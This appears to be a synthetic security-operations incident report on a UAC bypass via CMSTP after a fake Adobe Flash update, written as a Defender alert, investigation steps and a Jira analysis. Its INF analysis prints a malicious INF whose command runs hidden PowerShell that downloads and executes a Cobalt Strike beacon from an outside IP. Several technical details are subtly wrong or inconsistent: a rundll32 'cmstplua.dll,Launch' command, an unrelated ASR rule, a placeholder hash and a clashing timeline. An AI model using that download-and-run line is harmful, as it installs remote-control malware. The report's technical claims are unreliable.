Microsoft Defender Alert Details
Alert ID: MD-UAC-BYPASS-1548-7842
Alert Time: 2024-02-17 14:15:33 EST
Severity: HIGH (85/100)
Source: Microsoft Defender for Endpoint
Rule: “UAC Bypass Attempt Detected”
MITRE ATT&CK: T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control
Alert Details:
Detection: Process attempted to bypass UAC using CMSTPLUA COM interface
Host: FIN-WS-112 (Finance Department)
User: jdoe (Jane Doe – Standard User)
Time: 14:10 EST
Process Tree:
– explorer.exe (PID: 2341 – user context)
– rundll32.exe (PID: 3789)
– Command: rundll32.exe C:\Windows\System32\cmstplua.dll,Launch
– cmstp.exe (PID: 3792) – spawned by COM
– Command: cmstp.exe /s C:\Users\jdoe\AppData\Local\Temp\install.inf
File Created:
– C:\Users\jdoe\AppData\Local\Temp\install.inf
– Content: Malicious INF file designed to execute elevated command
– SHA256: a1b2c3d4e5f6…
Elevated Action:
– cmstp.exe (running as medium integrity) triggered UAC bypass
– Result: Elevated command prompt launched as HIGH integrity
– Command: whoami /groups (confirmed high integrity)
Detection Logic:
– CMSTPLUA COM interface known UAC bypass technique
– User jdoe is standard user, should not get high integrity
– INF file contains suspicious commands
– Pattern matches “UACME” toolkit
Additional Context:
– User clicked “Update Now” in fake Adobe Flash pop-up
– INF file downloaded by previous script
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Defender alert
Microsoft 365 Defender
Confirmed UAC bypass attempt using CMSTPLUA
2. INF Analysis
Analyze install.inf
Manual review, Sandbox
INF file executes PowerShell to download additional payload
3. Process Investigation
Check elevated processes
Defender, CrowdStrike
No persistent elevated processes found
4. Immediate Action
Kill elevated processes
Defender
All processes terminated
5. File Deletion
Delete malicious INF
PowerShell
install.inf removed
6. User Interview
Contact user
Teams, Phone
User clicked fake Adobe Flash update
Jira Incident Report
Ticket: SOC-2024-087
Summary: T1548 – UAC Bypass Attempt via CMSTPLUA Technique
Status: RESOLVED
Resolution: MALICIOUS – UAC Bypass Blocked
Priority: P2 – MEDIUM
Labels: T1548, uac-bypass, elevation-control, defender, phishing
Components: Endpoint-Security, Privilege-Escalation
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “UAC Bypass Attempt Detected”.
Host: FIN-WS-112 (Finance Department, user jdoe).
Time: 2024-02-17 14:15 EST.
Technique: MITRE ATT&CK T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control.
2. Technical Analysis:
Attack Chain:
14:00 – User visits news site, sees “Adobe Flash Update” pop-up
14:01 – User clicks “Update Now”
14:02 – Downloader script runs, saves install.inf to Temp folder
14:03 – Script triggers UAC bypass via CMSTPLUA COM interface
14:04 – CMSTP launches with install.inf
14:05 – INF file executes PowerShell as high integrity
14:06 – PowerShell downloads additional payload (blocked)
14:10 – Defender detects UAC bypass
UAC Bypass Technique:
Method: CMSTPLUA COM object (Microsoft Connection Manager)
Execution: rundll32 launches CMSTP via COM
Result: Medium integrity process spawns high integrity process
Tool: UACME technique #23
INF File Analysis:
File: install.inf (SHA256: a1b2c3d4…)
Content:
[Version]
Signature=$CHICAGO$
[DefaultInstall]
RunPreSetupCommands=powershell -WindowStyle Hidden -Command “Invoke-WebRequest -Uri http://185.143.221[.]89/beacon.exe -OutFile %temp%\beacon.exe; %temp%\beacon.exe”
Effect: When processed by CMSTP, runs PowerShell with high integrity
Payload:
beacon.exe: Cobalt Strike beacon (blocked by firewall)
No execution occurred (network blocked)
3. Investigation Findings:
Timeline:
14:00 – User clicks fake update
14:01-14:05 – UAC bypass chain
14:05 – PowerShell attempts download (blocked)
14:10 – Defender alert
14:12 – SOC investigates
14:15 – Processes terminated, INF deleted
Indicators of Compromise (IoCs):
Files:
– install.inf (SHA256: a1b2c3d4…)
Network:
– http://185.143.221[.]89/beacon.exe
Technique:
– CMSTPLUA COM object abuse
4. Containment Actions:
Immediate Actions:
Terminated all elevated processes.
Deleted install.inf.
Blocked download URL at firewall.
Host Remediation:
Full scan (no other malware).
No reimage needed.
User Remediation:
User educated on fake updates.
Reported malicious site.
5. Root Cause Analysis:
Primary Cause: User clicked fake Adobe Flash update pop-up.
Contributing Factors:
UAC bypass technique exploited legitimate Windows feature.
User running as standard user (but bypass still worked).
No ASR rule blocking CMSTP execution.
6. Business Impact:
Operational Impact: Finance workstation offline for 1 hour.
Data Exposure: None (payload download blocked).
7. Remediation & Prevention:
Completed Actions:
UAC bypass chain stopped.
Malicious files removed.
User educated.
Technical Controls Enhanced:
Enabled ASR rule “Block abuse of exploited vulnerable signed drivers”.
Blocked CMSTP execution via AppLocker for standard users.
Enhanced monitoring for UAC bypass techniques.
8. Conclusion:
A user clicked a fake Adobe Flash update that triggered a UAC bypass using the CMSTPLUA technique. The bypass attempted to download a Cobalt Strike beacon with elevated privileges. Defender detected the technique, and the download was blocked. No compromise occurred.
Closure Rationale: UAC bypass stopped; user educated; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-17 15:00 EST